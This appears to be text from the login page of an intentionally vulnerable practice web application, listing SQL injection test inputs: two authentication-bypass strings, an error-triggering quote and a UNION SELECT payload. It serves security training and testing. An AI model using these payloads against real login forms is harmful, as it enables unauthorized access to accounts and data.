⚠️ This application is INTENTIONALLY VULNERABLE. For authorized testing only.
🔐 Login Page (SQL Injection Vulnerable)
💡 SQL Injection Test Cases:
- Auth Bypass: Username:
admin' OR '1'='1' -- Password: anything
- Auth Bypass 2: Username:
' OR 1=1 --
- Error Based: Username:
admin'
- UNION: Username:
' UNION SELECT 1,'admin','pass',4,5,6,7 --